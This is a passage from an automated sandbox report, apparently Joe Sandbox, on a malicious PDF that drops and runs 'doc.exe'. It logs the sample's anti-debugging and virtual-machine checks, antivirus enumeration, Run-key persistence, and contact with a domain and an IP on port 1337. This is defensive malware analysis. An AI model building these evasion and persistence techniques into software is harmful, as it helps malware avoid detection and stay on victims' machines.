Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe | Memory allocated: page read and write and page guard
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe | System information queried: KernelDebuggerInformation
Enables debug privileges
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe | Process token adjusted: Debug

Malware Analysis System Evasion:

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: AcroRd32.exe | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllrShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\LocL
Source: iexplore.exe | Binary or memory string: Hyper-V RAW
Queries a list of all running processes
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe | Process information queried: ProcessInformation
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe | Thread delayed: delay time: 922337203685477
Enumerates the file system
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe | File opened: C:\Users\user\AppData\
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe | File opened: C:\Users\user\
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Uses ping.exe to sleep
Source: unknown | Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 1000
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 1000

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | Process information set: NOOPENFILEERRORBOX (3 identical entries)
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Process information set: NOOPENFILEERRORBOX (6 identical entries)
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe | Process information set: NOOPENFILEERRORBOX (52 identical entries)
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe | Process information set: NOOPENFILEERRORBOX (48 identical entries)

Lowering of HIPS / PFW / Operating System Security Settings:

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter : SELECT * FROM FirewallProduct

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Queries the volume information (name, serial number etc.) of a device
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe | Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation (2 identical entries)
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe | Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation (2 identical entries)

Behavior Graph

Behavior graph (rendered as an image in the original report; recoverable data): Behavior Graph ID 491829, sample aaa.pdf, start date 03/02/2018, architecture WINDOWS, score 88.
Process tree: AcroRd32.exe starts iexplore.exe, RdrCEF.exe and a second AcroRd32.exe; iexplore.exe drops doc.exe (with Zone.Identifier) and starts it; doc.exe drops a second doc.exe under C:\Users\user\AppData\Local\Temp\ and starts it together with cmd.exe, which runs conhost.exe and PING.EXE.
Network contacts: zwangerschapsyogaamsterdamwest.nl (192.185.103.35, port 80, CYRUSONE-CyrusOneLLCUS), 213.183.58.7 (port 1337, MELBICOM-EU-ASNL, flagged as TCP or UDP traffic on a non-standard port), 8.8.8.8 (port 53, GOOGLE-GoogleIncUS) and 1.1.1.1 (ping).
Signatures shown on the graph: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); clickable URLs found in PDF pointing to bad files; antivirus detection for submitted file; browser exploit detected (process start blacklist hit); queries sensitive video device information (via WMI, Win32_VideoController); uses ping.exe to sleep; 4 other signatures.

Simulations

Behavior and APIs

Time | Type | Description
21:33:32 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run flurant C:\Users\user\AppData\Roaming\\williams.exe

Antivirus Detection

Initial Sample

Source | Detection | Cloud link
aaa.pdf | 8% | virustotal

Dropped Files

No Antivirus matches

Domains

Source | Detection | Cloud link
zwangerschapsyogaamsterdamwest.nl | 0% | virustotal

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs


    Domains

    No context

    ASN


    Dropped Files

    No context

    Screenshot